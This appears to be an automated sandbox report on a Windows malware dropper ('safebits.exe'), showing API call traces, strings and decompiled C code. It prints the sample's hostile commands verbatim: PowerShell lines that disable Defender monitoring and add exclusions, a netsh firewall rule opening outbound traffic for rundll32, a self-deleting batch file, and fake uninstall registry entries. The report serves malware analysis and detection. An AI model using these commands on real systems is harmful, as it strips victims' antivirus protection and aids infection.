                                                                • ShellExecuteExA.SHELL32(0044722B,00000000,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,00000000,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,00000000,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,",echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,C:\Users\user\AppData\Local\Temp\oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,0043F701,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,start /min ), ref: 00401FA0
                                                                • Sleep.KERNEL32(00001388,kernel32,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,00000000,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,\IDFcan), ref: 00401FAA
                                                                • GetTempPathA.KERNEL32(000001F4,C:\Users\user\AppData\Local\Temp\oh161a161.bat,00001388,kernel32,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,00000000,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,\IDFcan), ref: 00401FB9
                                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\oh161a161.bat,oh161a161.bat,000001F4,C:\Users\user\AppData\Local\Temp\oh161a161.bat,00001388,kernel32,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,00000000,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,\IDFcan), ref: 00401FC8
                                                                • DeleteFileA.KERNEL32(C:\Users\user\AppData\Local\Temp\oh161a161.bat,C:\Users\user\AppData\Local\Temp\oh161a161.bat,oh161a161.bat,000001F4,C:\Users\user\AppData\Local\Temp\oh161a161.bat,00001388,kernel32,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,00000000,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,\IDFcan), ref: 00401FD2
                                                                • CloseHandle.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\oh161a161.bat,C:\Users\user\AppData\Local\Temp\oh161a161.bat,oh161a161.bat,000001F4,C:\Users\user\AppData\Local\Temp\oh161a161.bat,00001388,kernel32,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,00000000,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,\IDFcan), ref: 00401FDE
                                                                • lstrcpyA.KERNEL32(C:\Users\user\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91), ref: 00402078
                                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe,C:\Users\user\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91), ref: 00402082
                                                                • lstrcpyA.KERNEL32(C:\Users\user\AppData\Roaming\IDFcan\miakhad.dll",xpi,C:\Users\user\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe,C:\Users\user\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe,C:\Users\user\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91), ref: 004020B1
                                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Roaming\IDFcan\miakhad.dll",xpi,\miakhad.dll,C:\Users\user\AppData\Roaming\IDFcan\miakhad.dll",xpi,C:\Users\user\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe,C:\Users\user\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe,C:\Users\user\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91), ref: 004020C0
                                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe,\2707952b-6f11-481e-99be-b28317af8e3d.exe,C:\Users\user\AppData\Roaming\IDFcan\miakhad.dll",xpi,\miakhad.dll,C:\Users\user\AppData\Roaming\IDFcan\miakhad.dll",xpi,C:\Users\user\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe,C:\Users\user\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe,C:\Users\user\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91), ref: 004020CF
                                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe,C:\Users\user\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe,\2707952b-6f11-481e-99be-b28317af8e3d.exe,C:\Users\user\AppData\Roaming\IDFcan\miakhad.dll",xpi,\miakhad.dll,C:\Users\user\AppData\Roaming\IDFcan\miakhad.dll",xpi,C:\Users\user\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe,C:\Users\user\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe,C:\Users\user\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91), ref: 004020D9
                                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Roaming\IDFcan\miakhad.dll",xpi,",xpi), ref: 004020E8
                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000258,C:\Users\user\AppData\Roaming\IDFcan\miakhad.dll",xpi,",xpi), ref: 004020FB
                                                                • Sleep.KERNEL32(00000BB8,?,00000258,C:\Users\user\AppData\Roaming\IDFcan\miakhad.dll",xpi,",xpi), ref: 00402106
                                                                • Sleep.KERNEL32(000009C4,00000BB8,?,00000258,C:\Users\user\AppData\Roaming\IDFcan\miakhad.dll",xpi,",xpi), ref: 00402119
                                                                • Sleep.KERNEL32(000009C4,00000BB8,?,00000258,C:\Users\user\AppData\Roaming\IDFcan\miakhad.dll",xpi,",xpi), ref: 0040212C
                                                                • Sleep.KERNEL32(000009C4,00000BB8,?,00000258,C:\Users\user\AppData\Roaming\IDFcan\miakhad.dll",xpi,",xpi), ref: 0040213F
                                                                • Sleep.KERNEL32(000009C4,00000BB8,?,00000258,C:\Users\user\AppData\Roaming\IDFcan\miakhad.dll",xpi,",xpi), ref: 00402152
                                                                • Sleep.KERNEL32(000009C4,00000BB8,?,00000258,C:\Users\user\AppData\Roaming\IDFcan\miakhad.dll",xpi,",xpi), ref: 00402165
                                                                • Sleep.KERNEL32(0000157C,00000BB8,?,00000258,C:\Users\user\AppData\Roaming\IDFcan\miakhad.dll",xpi,",xpi), ref: 00402178
                                                                • lstrcpyA.KERNEL32("C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,00000BB8,?,00000258,C:\Users\user\AppData\Roaming\IDFcan\miakhad.dll",xpi,",xpi), ref: 00402189
                                                                • lstrcatA.KERNEL32("C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,?,"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,00000BB8,?,00000258,C:\Users\user\AppData\Roaming\IDFcan\miakhad.dll",xpi,",xpi), ref: 004021A3
                                                                • ShellExecuteExA.SHELL32(0044722B,"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,?,"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,00000BB8,?,00000258,C:\Users\user\AppData\Roaming\IDFcan\miakhad.dll",xpi,",xpi), ref: 004021EF
                                                                • Sleep.KERNEL32(000003E8,0044722B,"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,?,"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,00000BB8,?,00000258,C:\Users\user\AppData\Roaming\IDFcan\miakhad.dll",xpi,",xpi), ref: 00402202
                                                                • OpenMutexA.KERNEL32 ref: 0040221F
                                                                • RegCreateKeyExA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\2707952b-6f11-481e-99be-b28317af8e3d,00000000,00000000,00000000,000F003F,00000000,004433FC,00443400,00100000,00000000,707952b-6f11-481e-99be-b28317af8e3d,000001F4,00100000,00000000,707952b-6f11-481e-99be-b28317af8e3d), ref: 0040225A
                                                                • lstrlenA.KERNEL32(2707952b-6f11-481e-99be-b28317af8e3d,80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\2707952b-6f11-481e-99be-b28317af8e3d,00000000,00000000,00000000,000F003F,00000000,004433FC,00443400,00100000,00000000,707952b-6f11-481e-99be-b28317af8e3d,000001F4,00100000,00000000), ref: 00402264
                                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe,DisplayName,00000001,2707952b-6f11-481e-99be-b28317af8e3d,00000000,2707952b-6f11-481e-99be-b28317af8e3d,80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\2707952b-6f11-481e-99be-b28317af8e3d,00000000,00000000,00000000,000F003F,00000000,004433FC,00443400,00100000), ref: 00402280
                                                                • lstrlenA.KERNEL32(South Editor Ltd.,UninstallString,00000001,C:\Users\user\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe,00000000,C:\Users\user\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe,DisplayName,00000001,2707952b-6f11-481e-99be-b28317af8e3d,00000000,2707952b-6f11-481e-99be-b28317af8e3d,80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\2707952b-6f11-481e-99be-b28317af8e3d,00000000,00000000,00000000), ref: 0040229C
                                                                • RegCloseKey.ADVAPI32(Publisher,00000001,South Editor Ltd.,00000000,South Editor Ltd.,UninstallString,00000001,C:\Users\user\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe,00000000,C:\Users\user\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe,DisplayName,00000001,2707952b-6f11-481e-99be-b28317af8e3d,00000000,2707952b-6f11-481e-99be-b28317af8e3d,80000001), ref: 004022B9
                                                                • RegCreateKeyExA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4864a531-7c66-4f8b-8bca-339fdcb93393},00000000,00000000,00000000,000F003F,00000000,004433FC,00443400,00100000,00000000,707952b-6f11-481e-99be-b28317af8e3d,000001F4,00100000,00000000,707952b-6f11-481e-99be-b28317af8e3d), ref: 004022DF
                                                                • lstrlenA.KERNEL32({4864a531-7c66-4f8b-8bca-339fdcb93393},80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4864a531-7c66-4f8b-8bca-339fdcb93393},00000000,00000000,00000000,000F003F,00000000,004433FC,00443400,00100000,00000000,707952b-6f11-481e-99be-b28317af8e3d,000001F4,00100000,00000000), ref: 004022E9
                                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe,DisplayName,00000001,{4864a531-7c66-4f8b-8bca-339fdcb93393},00000000,{4864a531-7c66-4f8b-8bca-339fdcb93393},80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4864a531-7c66-4f8b-8bca-339fdcb93393},00000000,00000000,00000000,000F003F,00000000,004433FC,00443400,00100000), ref: 00402305
                                                                • lstrlenA.KERNEL32(South Editor Ltd.,UninstallString,00000001,C:\Users\user\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe,00000000,C:\Users\user\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe,DisplayName,00000001,{4864a531-7c66-4f8b-8bca-339fdcb93393},00000000,{4864a531-7c66-4f8b-8bca-339fdcb93393},80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4864a531-7c66-4f8b-8bca-339fdcb93393},00000000,00000000,00000000), ref: 00402321
                                                                • RegCloseKey.ADVAPI32(Publisher,00000001,South Editor Ltd.,00000000,South Editor Ltd.,UninstallString,00000001,C:\Users\user\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe,00000000,C:\Users\user\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe,DisplayName,00000001,{4864a531-7c66-4f8b-8bca-339fdcb93393},00000000,{4864a531-7c66-4f8b-8bca-339fdcb93393},80000001), ref: 0040233E
                                                                • RegCreateKeyExA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{de2c9435-807b-4ef9-84e9-24af9a832065},00000000,00000000,00000000,000F003F,00000000,004433FC,00443400,Publisher,00000001,South Editor Ltd.,00000000,South Editor Ltd.,UninstallString,00000001), ref: 00402364
                                                                • RegCloseKey.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{de2c9435-807b-4ef9-84e9-24af9a832065},00000000,00000000,00000000,000F003F,00000000,004433FC,00443400,Publisher,00000001,South Editor Ltd.,00000000,South Editor Ltd.,UninstallString,00000001), ref: 0040236F
                                                                • GetTickCount.KERNEL32 ref: 00402374
                                                                • lstrcatA.KERNEL32(rundll32.exe, 6i/91,80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{de2c9435-807b-4ef9-84e9-24af9a832065},00000000,00000000,00000000,000F003F,00000000,004433FC,00443400,Publisher,00000001,South Editor Ltd.,00000000,South Editor Ltd.), ref: 00402396
                                                                • lstrlenA.KERNEL32(rundll32.exe,rundll32.exe, 6i/91,80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{de2c9435-807b-4ef9-84e9-24af9a832065},00000000,00000000,00000000,000F003F,00000000,004433FC,00443400,Publisher,00000001,South Editor Ltd.,00000000), ref: 004023A0
                                                                • RegCloseKey.ADVAPI32(IDFcan,00000001,rundll32.exe,00000000,rundll32.exe,rundll32.exe, 6i/91,80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{de2c9435-807b-4ef9-84e9-24af9a832065},00000000,00000000,00000000,000F003F,00000000,004433FC,00443400), ref: 004023C8
                                                                • ExitProcess.KERNEL32(?,"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,00000BB8,?,00000258,C:\Users\user\AppData\Roaming\IDFcan\miakhad.dll",xpi,",xpi), ref: 004023D7
                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,00000258,?,"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,00000BB8,?,00000258,C:\Users\user\AppData\Roaming\IDFcan\miakhad.dll",xpi,",xpi), ref: 00402407
                                                                • ExitProcess.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,00000258,?,"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,00000BB8,?,00000258,C:\Users\user\AppData\Roaming\IDFcan\miakhad.dll",xpi,",xpi), ref: 00402449
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.811078300.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000D.00000002.811102499.000000000043C000.00000040.00020000.sdmp
                                                                • Associated: 0000000D.00000002.811121010.0000000000443000.00000040.00020000.sdmp
                                                                • Associated: 0000000D.00000002.811136166.0000000000446000.00000040.00020000.sdmp
                                                                • Associated: 0000000D.00000002.811154545.000000000044A000.00000040.00020000.sdmp
                                                                Similarity
                                                                • API ID: lstrcat$lstrlen$Sleep$Close$lstrcpy$Create$FileHandleModulePathProcess$ExecuteExitNameShellTemp$AddressCountCurrentDeleteDirectoryFolderMutexOpenProcTick_lwrite
                                                                • String ID: echo exit >> $echo powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> $start /min $ 6i/91$"$",xpi$"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91$"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe$.bat$2707952b-6f11-481e-99be-b28317af8e3d$707952b-6f11-481e-99be-b28317af8e3d$7sr48er48$C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe$C:\Users\user\AppData\Local\Temp\oh161a161.bat$C:\Users\user\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe$C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll$C:\Users\user\AppData\Roaming\IDFcan\miakhad.dll",xpi$DisplayName$IsWow64Process$Publisher$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\2707952b-6f11-481e-99be-b28317af8e3d$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4864a531-7c66-4f8b-8bca-339fdcb93393}$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{de2c9435-807b-4ef9-84e9-24af9a832065}$South Editor Ltd.$UninstallString$\2707952b-6f11-481e-99be-b28317af8e3d.exe$\IDFcan$\jdfddn.dll$\miakhad.dll$echo timeout 3 > $echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te$jdfddn$kernel32$oh161a161.bat$open$rundll32.exe$setupqqadvfirewall firewall add rule name="Rundll32" dir=out action=allow protocol=any program="C:\Windows\system32\rundll32.exe"${4864a531-7c66-4f8b-8bca-339fdcb93393}$,
                                                                • API String ID: 3764267295-455028363
                                                                • Opcode ID: e34f5e8c899a677bad9d6b48a8b88ea52d3238adf7c3ac527ec171e2b32dc1d5
                                                                • Instruction ID: 1591e977169bb0be4debda6a2a8e8e43d9763fad91d46ce22df9f2f33243429f
                                                                • Opcode Fuzzy Hash: e34f5e8c899a677bad9d6b48a8b88ea52d3238adf7c3ac527ec171e2b32dc1d5
                                                                • Instruction Fuzzy Hash: 4C022620B843416DF7147B619D8BF9D2A426B5AB09F30603BF5017A2E3CBFC4A45575E
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 86%
                                                                			_entry_(void* __ecx) {
                                                                				void* _t25;
                                                                
                                                                				_t25 = __ecx;
                                                                				if(E00402B5E(0, _t9, lstrlenA(GetCommandLineA()), "setupqqadvfirewall firewall add rule name=\"Rundll32\" dir=out action=allow protocol=any program=\"C:\\Windows\\system32\\rundll32.exe\"", 7) != 0xffffffff) {
                                                                					ExitProcess();
                                                                					 *0x43f5e9 = 0x6e65706f;
                                                                					 *0x43f5ed = 0;
                                                                					0x447267->cbSize = 0x3c;
                                                                					 *0x0044726B = 0x40;
                                                                					 *0x00447273 = 0x43f5e9;
                                                                					 *0x00447277 = "netsh.exe";
                                                                					 *((intOrPtr*)(0x44727b)) = "advfirewall firewall add rule name=\"Rundll32\" dir=out action=allow protocol=any program=\"C:\\Windows\\system32\\rundll32.exe\"";
                                                                					 *0x00447283 = 0;
                                                                					GetVersion();
                                                                					GetWindowsDirectoryA("C:\Users\jones\AppData\Local\Temp\cyscuq0veku\safebits.exe", 0x3e8);
                                                                					if( *((char*)(lstrlenA(?str?) - 1 + 0x44039c)) != 0x5c) {
                                                                						lstrcatA("C:\Users\jones\AppData\Local\Temp\cyscuq0veku\safebits.exe", "\\system32\\WindowsPowershell\\v1.0\\powershell.exe");
                                                                					} else {
                                                                						lstrcatA("C:\Users\jones\AppData\Local\Temp\cyscuq0veku\safebits.exe", "system32\\WindowsPowershell\\v1.0\\powershell.exe");
                                                                					}
                                                                					 *((intOrPtr*)(0x447277)) = 0x44039c;
                                                                					 *((intOrPtr*)(0x44727b)) = "Set-MpPreference -DisableBehaviorMonitoring $true ; Set-MpPreference -MAPSReporting 0 ; Set-MpPreference -ExclusionProcess rundll32.exe ; Set-MpPreference -ExclusionExtension dll";
                                                                					ShellExecuteExA(0x447267);
                                                                					ExitProcess(??);
                                                                				}
                                                                				"jdfddn.dll" =  &("jdfddn.dll"[1]);
                                                                				"jdfddn" =  &("jdfddn"[1]); // executed
                                                                				GetForegroundWindow(); // executed
                                                                				 *0x449abb = GetTickCount();
                                                                				 *0x446edb = GetProcessHeap();
                                                                				return E0040128A(_t14, _t25, 0);
                                                                			}


                                                                APIs
                                                                • GetCommandLineA.KERNEL32 ref: 00401000
                                                                • lstrlenA.KERNEL32(00000000), ref: 00401008
                                                                • ExitProcess.KERNEL32(00000000,00000000,00000000,setupqqadvfirewall firewall add rule name="Rundll32" dir=out action=allow protocol=any program="C:\Windows\system32\rundll32.exe",00000007,00000000), ref: 00401026
                                                                • GetVersion.KERNEL32(?,?,00000000,00000000,00000000,setupqqadvfirewall firewall add rule name="Rundll32" dir=out action=allow protocol=any program="C:\Windows\system32\rundll32.exe",00000007,00000000), ref: 0040106F
                                                                • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,000003E8,?,?,00000000,00000000,00000000,setupqqadvfirewall firewall add rule name="Rundll32" dir=out action=allow protocol=any program="C:\Windows\system32\rundll32.exe",00000007,00000000), ref: 00401080
                                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,000003E8,?,?,00000000,00000000,00000000,setupqqadvfirewall firewall add rule name="Rundll32" dir=out action=allow protocol=any program="C:\Windows\system32\rundll32.exe",00000007,00000000), ref: 0040108A
                                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,system32\WindowsPowershell\v1.0\powershell.exe,C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,000003E8,?,?,00000000,00000000,00000000,setupqqadvfirewall firewall add rule name="Rundll32" dir=out action=allow protocol=any program="C:\Windows\system32\rundll32.exe",00000007,00000000), ref: 004010A3
                                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,\system32\WindowsPowershell\v1.0\powershell.exe,C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,000003E8,?,?,00000000,00000000,00000000,setupqqadvfirewall firewall add rule name="Rundll32" dir=out action=allow protocol=any program="C:\Windows\system32\rundll32.exe",00000007,00000000), ref: 004010B4
                                                                • ShellExecuteExA.SHELL32(00447267,C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,\system32\WindowsPowershell\v1.0\powershell.exe,C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,000003E8,?,?,00000000,00000000,00000000,setupqqadvfirewall firewall add rule name="Rundll32" dir=out action=allow protocol=any program="C:\Windows\system32\rundll32.exe",00000007,00000000), ref: 004010D3
                                                                • ExitProcess.KERNEL32(00447267,C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,\system32\WindowsPowershell\v1.0\powershell.exe,C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,000003E8,?,?,00000000,00000000,00000000,setupqqadvfirewall firewall add rule name="Rundll32" dir=out action=allow protocol=any program="C:\Windows\system32\rundll32.exe",00000007,00000000), ref: 004010D8
                                                                • GetForegroundWindow.USER32(00000000,00000000,00000000,setupqqadvfirewall firewall add rule name="Rundll32" dir=out action=allow protocol=any program="C:\Windows\system32\rundll32.exe",00000007,00000000), ref: 004010E9
                                                                • GetTickCount.KERNEL32 ref: 004010EE
                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000000,setupqqadvfirewall firewall add rule name="Rundll32" dir=out action=allow protocol=any program="C:\Windows\system32\rundll32.exe",00000007,00000000), ref: 004010F8
                                                                Strings
                                                                • \system32\WindowsPowershell\v1.0\powershell.exe, xrefs: 004010AA
                                                                • setupqqadvfirewall firewall add rule name="Rundll32" dir=out action=allow protocol=any program="C:\Windows\system32\rundll32.exe", xrefs: 0040100F
                                                                • netsh.exe, xrefs: 00401058
                                                                • C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe, xrefs: 0040107B, 00401085, 0040109E, 004010AF, 004010C0
                                                                • jdfddn, xrefs: 004010E3
                                                                • open, xrefs: 00401051
                                                                • Set-MpPreference -DisableBehaviorMonitoring $true ; Set-MpPreference -MAPSReporting 0 ; Set-MpPreference -ExclusionProcess rundll32.exe ; Set-MpPreference -ExclusionExtension dll, xrefs: 004010C7
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.811078300.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000D.00000002.811102499.000000000043C000.00000040.00020000.sdmp
                                                                • Associated: 0000000D.00000002.811121010.0000000000443000.00000040.00020000.sdmp
                                                                • Associated: 0000000D.00000002.811136166.0000000000446000.00000040.00020000.sdmp
